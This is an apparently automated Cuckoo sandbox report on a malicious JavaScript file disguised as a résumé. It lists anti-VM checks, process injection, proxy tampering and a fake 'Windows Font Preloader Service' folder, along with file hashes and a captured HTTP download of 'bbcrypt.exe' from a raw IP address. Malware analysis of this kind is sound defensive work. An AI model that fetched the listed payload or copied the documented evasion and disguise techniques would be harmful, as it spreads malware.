| Category | Started On | Completed On | Duration | Cuckoo Version |
|---|---|---|---|---|
| FILE | 2016-08-22 20:25:03.600433 | 2016-08-22 20:26:05.925865 | 62 seconds | 2.0-dev |
| Machine | Label | Manager | Started On | Shutdown On |
|---|---|---|---|---|
| win7cuckoo | win7 Clone 1 | VirtualBox | 2016-08-22 20:25:04 | 2016-08-22 20:26:05 |
File Details

| Field | Value |
|---|---|
| File name | da0042e4ca77ad11ec0a9c10571b01d07d582d2b.zip |
| File size | 4447 bytes |
| File type | Zip archive data, at least v2.0 to extract |
| CRC32 | 06BAC4ED |
| MD5 | 6a5689dae28663ab8fa7d19d5f426e85 |
| SHA1 | da0042e4ca77ad11ec0a9c10571b01d07d582d2b |
| SHA256 | 4e1dcb723bba7d94489152292ded593a9e1d107989169e947d6b179172dc2b56 |
| SHA512 | 5d356f13f7fe582f0e413191d469996e205232abc996b37adc51ef60d20e276688d8ecf02fbe9fa2586171ce53ad30295b32bfb52cc642f470b59dd949fa90cc |
| Ssdeep | 96:KXdBWeXpCRvL2FVs9awzWcuBjIUSDDGr8wH7:K7WeXpMvqFV4awycumU+jwH7 |
| PEiD | None matched |
| Yara | |
| VirusTotal | File not found on VirusTotal |
Signatures

- recon_fingerprint: Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)
- dumped_buffer: One or more potentially interesting buffers were extracted; these generally contain injected code, configuration data, etc.
- Windows_Connection_Settings_Accessed: Touches network settings in the registry
- suspicious_process: Creates a suspicious process
- Windows_Proxy_Tinkering: Accesses or modifies proxy settings
- network_wscript_downloader: Wscript.exe initiated network communications indicative of a script-based payload download
- persistence_ads: Creates an Alternate Data Stream (ADS)
- antivm_generic_cpu: Checks the CPU name from the registry, possibly for anti-virtualization
- antiav_bitdefender_libs: Detects Bitdefender Antivirus through the presence of a library
- antivm_vmware_files: Detects VMware through the presence of various files
- antiemu_wine: Detects the presence of the Wine emulator
- injection_runpe: Executed a process and injected code into it, probably while unpacking
Screenshots
No screenshots available.
Static Analysis
Nothing to display.
Dropped Files

| Field | Value |
|---|---|
| File name | e3b0c44298fc1c14_npicgzugz.txt |
| File size | 0 bytes |
| File type | empty |
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
| Ssdeep | 3:: |
| Yara | None matched |

| Field | Value |
|---|---|
| File name | ca51b6961bcd15f5_15iy37s3aay.exe |
| File size | 545792 bytes |
| File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit |
| MD5 | 11d4dbf3863f71f431a0ca39850acf97 |
| SHA1 | af505af0e001de4f6470c679afa786ab752d0c56 |
| SHA256 | ca51b6961bcd15f50faa096d5bc987dc0ad41441175d5551ce6c3927e553e136 |
| SHA512 | 3fbb2c719341d2c30d41c0ce2544670a88b5556096de868bea88ffba6fd54b50d9f5a7a9dbb4ff4744060a4919aaa94a5a21cc45b6cdd6b84e45e835378150a1 |
| Ssdeep | 12288:B6oh8b+tu7CLs0qJIzrgPch80V+idl7+iuDsL:BR8bpO9KQ80Vxdt+zDsL |
| Yara | None matched |

| Field | Value |
|---|---|
| File name | d8e491d8ee3e048b_Greg-Resume.js |
| File size | 10506 bytes |
| File type | ASCII text |
| MD5 | e075bbf722693ef2ef1c9f4b871e3d5e |
| SHA1 | 5f69dba7e77a44dc1bab0363ddc0c2fb14ea5f5a |
| SHA256 | d8e491d8ee3e048b66882faa3a6bec02ae3c66857396d4225c8a3604611feded |
| SHA512 | 1472df284d41758b7831bed0281fe0d7f0306ee8350d8dbe1300709b6cdc40325fbd3e11b434709c992808305073be021abf8a28234d4b9927633010ddd27517 |
| Ssdeep | 192:WnPon7dSlC5ORiL0RV/4ScXhlFl7koXIS+U+djdi:w/l8Og0RV/4ScXhd7ko/+Jdo |
| Yara | None matched |

| Field | Value |
|---|---|
| File name | Greg-Resume.js |
| File size | 10506 bytes |
| File type | ASCII text |
| MD5 | e075bbf722693ef2ef1c9f4b871e3d5e |
| SHA1 | 5f69dba7e77a44dc1bab0363ddc0c2fb14ea5f5a |
| SHA256 | d8e491d8ee3e048b66882faa3a6bec02ae3c66857396d4225c8a3604611feded |
| SHA512 | 1472df284d41758b7831bed0281fe0d7f0306ee8350d8dbe1300709b6cdc40325fbd3e11b434709c992808305073be021abf8a28234d4b9927633010ddd27517 |
| Ssdeep | 192:WnPon7dSlC5ORiL0RV/4ScXhlFl7koXIS+U+djdi:w/l8Og0RV/4ScXhd7ko/+Jdo |
| Yara | None matched |
Network Analysis

IP Address
- 52.169.179.91
- 8.8.8.8
- 93.174.91.49

| Domain | IP Address |
|---|---|
| teredo.ipv6.microsoft.com | 67.195.61.46 |
| dns.msftncsi.com | 131.107.255.255 |
| ipv6.msftncsi.com | |
URL: http://93.174.91.49/bbcrypt.exe

Data:
GET /bbcrypt.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 93.174.91.49
Connection: Keep-Alive
Behavior Summary
File-Read
- C:\Windows\SysWOW64\explorer.exe
- C:\ProgramData\Windows Font Preloader Service\15iy37s3aay.exe
- C:\Windows\System32\wshom.ocx
- C:\Windows\System32\stdole2.tlb
- C:\Users\Harry Dresden\AppData\Local\Temp\Greg-Resume.js
- C:\Windows\System32\msxml3.dll
- C:\Users\Harry Dresden\Desktop\desktop.ini
- C:\Windows\System32\wscript.exe
File-Written
- C:\Users\Harry Dresden\AppData\Local\Temp\rad0AFDD.tmp
- C:\Users\Harry Dresden\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YLC2QM2Y\bbcrypt[1].exe
File-Deleted
- C:\ProgramData\Windows Font Preloader Service\npicgzugz.txt
- C:\ProgramData\Windows Font Preloader Service\15iy37s3aay.exe:Zone.Identifier
- C:\Users\Harry Dresden\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000000.db
- C:\Users\Harry Dresden\AppData\Local\Temp\Greg-Resume.js
File-Opened
- C:\
- C:\Windows\SysWOW64\ntdll.dll
- C:\ProgramData\Windows Font Preloader Service
- C:\Windows\SysWOW64\tapi3.dll
- C:\ProgramData\Windows Font Preloader Service\15iy37s3aay.exe
- C:\Windows\SysWOW64\explorer.exe
- C:\Windows\System32\wshqos.dll
- C:\
- C:\Users\Harry Dresden\AppData\Local\
- C:\Windows\System32\msxml3.dll
- C:\Users\Harry Dresden\Desktop\desktop.ini
- C:\Windows\System32
- C:\Windows\System32\cmd.exe
- C:\Windows\System32\wshom.ocx
- C:\Users\
- C:\Users\Harry Dresden\
- C:\Users\Harry Dresden\AppData\
- C:\Users\Harry Dresden\AppData\Local\Temp\Greg-Resume.js
- C:\Windows\System32\en-US\wshtcpip.dll.mui
- C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac
- C:\Windows\System32\en-US\wshqos.dll.mui
- C:\Windows\
- C:\Windows\System32\en-US\wship6.dll.mui
- C:\Windows\System32\wscript.exe
- C:\Windows\System32\stdole2.tlb
- C:\Windows\Globalization\Sorting\sortdefault.nls
- C:\Windows\System32\
- C:\Users\Harry Dresden\AppData\Local\Temp\
- C:\Windows\System32\rsaenh.dll
- C:\Windows
- C:\Windows\System32\ieframe.dll
- C:\
- C:\Windows\Globalization\Sorting\sortdefault.nls
- C:\Users\
- C:\Users\Harry Dresden\
- C:\Users\Harry Dresden\AppData\
- C:\Users\Harry Dresden\AppData\Local\
File-Moved
- C:\Users\Harry Dresden\AppData\Local\Temp\rad0AFDD.tmp -> C:\ProgramData\Windows Font Preloader Service\15iy37s3aay.exe
Directory-Created
- C:\ProgramData\Windows Font Preloader Service
- C:\Users\Harry Dresden\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YLC2QM2Y
- C:\Users\Harry Dresden\AppData\Local\Microsoft\Windows\Caches
Directory-Enumerated
- C:\Users\Harry Dresden
- C:\Users\Harry Dresden\AppData\Local\Temp\rad0AFDD.tmp
- C:\Users\Harry Dresden\AppData\Local\Temp
- C:\Users\Harry Dresden\AppData\Local
- C:\Windows\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*
- C:\Users
- C:\Users\Harry Dresden\AppData
- C:\Users\Harry Dresden\AppData\Local\Temp\rad0AFDD.tmp
Registry Key-Deleted
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadDetectedUrl
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDetectedUrl
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Registry Key-Written
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\335446143c8
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\77c0dfcb60ac5c
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\dab2d44ff47
- HKEY_CURRENT_USER\Software\AppDataLow\Google Updater\LastUpdate
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\a4a7fbfdcd2e
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\6bf5ee163c0c6ac03bc
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\813b2c69f961f2b6be
- HKEY_CURRENT_USER\Software\AppDataLow\Software\{9986501E-992B-CD35-6266-A5874FE2BCCA}\0C4C1E75\07acef82af04\0ca5b420d3cfe95e35
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadDecisionReason
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadDecision
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadDecisionTime
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5F058833-0652-4B15-B7EA-02DD7798ACE8}\WpadNetworkName
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
Mutex-Accessed
- Local\ZonesCacheCounterMutex
- Local\ZonesLockedCacheCounterMutex
Volatility
Nothing to display.